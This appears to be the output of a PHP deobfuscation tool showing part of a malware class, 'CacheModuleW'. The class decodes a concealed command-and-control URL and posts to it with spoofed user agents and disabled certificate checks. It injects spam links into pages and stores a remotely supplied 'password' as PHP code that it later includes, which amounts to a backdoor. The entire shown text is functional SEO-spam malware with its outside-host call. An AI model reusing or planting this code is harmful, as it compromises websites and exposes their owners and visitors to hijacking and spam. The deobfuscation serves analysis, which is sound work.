if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $this->rUA());
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_TIMEOUT, 40);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$output = curl_exec($ch);
curl_close($ch);
} else {
$output = file_get_contents($url, false, stream_context_create(array('http' => array('method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $params))));
}
return $output;
}
private function getRandLinks()
{
if (!file_exists($this->uFile)) {
return false;
}
$links = [];
$linesIndArr = array();
$n = 1;
$handle = fopen($this->uFile, "r");
while (!feof($handle)) {
if (fgets($handle) !== false) {
$linesIndArr[] = $n++;
}
}
fclose($handle);
$linesIndArr = $this->shArr($linesIndArr);
$linesIndArr = array_slice($linesIndArr, 0, rand(4, 6));
$i = 0;
$handle = fopen($this->uFile, "r");
while (!feof($handle)) {
if (count($links) == count($linesIndArr)) {
break;
}
$line = fgets($handle);
if ($line !== false && in_array($i, $linesIndArr)) {
$link = json_decode(trim($line));
if (!empty($link)) {
$link = "<a href='" . urldecode($link->url) . "'>" . urldecode($link->keyword) . "</a> ";
$links[] = $link;
}
}
$i++;
}
fclose($handle);
return $links;
}
function dcdAu($au)
{
$goodservurl = array();
foreach (str_split($au) as $onechar) {
if (is_numeric($onechar)) {
if ($onechar >= 3) {
$onechar = $onechar - 3;
} else {
$onechar = $onechar + 10 - 3;
}
}
$goodservurl[] = $onechar;
}
return urldecode(base64_decode(implode($goodservurl)));
}
private function savePass($pass)
{
$this->fileAction($this->pFile, "w+", "<?php \$postPass = '" . $pass . "'; ?>");
}
private function rUA()
{
$uas = array("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)");
$uas = $this->shArr($uas);
return $uas[0];
}
private function shArr($arr)
{
srand((float)microtime() * 1000000);
shuffle($arr);
return $arr;
}
private function checkPostPass()
{
if (empty($this->post["postpass"])) {
return false;
}
if (file_exists($this->pFile)) {
@include($this->pFile);
if (!empty($postPass)) {
if ($this->post["postpass"] === $postPass) {
$this->postPass = $postPass;
return true;
}
}
}
return false;
}
private function randString($length)
{
$str = "";
$chars = "abcdefghijklmnopqrstuvwxyz0123456789";
$size = strlen($chars);
for ($i = 0; $i < $length; $i++) {
$str .= $chars[rand(0, $size - 1)];
}
return $str;
}
private function fileAction($path, $mode, $data)
{
$fod = fopen($path, $mode);
if (!$fod) {
return false;
}
fwrite($fod, $data);
fclose($fod);
return true;
}
}
$au = "aHR3cCUzQSUyRiUyRndvcmxkdHJhZmZpY6JvdXRlLnRvcCUyRmZhcGQyJTJGYXBpJTJGd52yaw==";
new CacheModuleW($au);
Function Calls
None |
Stats
MD5 | 114aaf73d9af5bc34051a2b9f77bf7aa |
Eval Count | 0 |
Decode Time | 84 ms |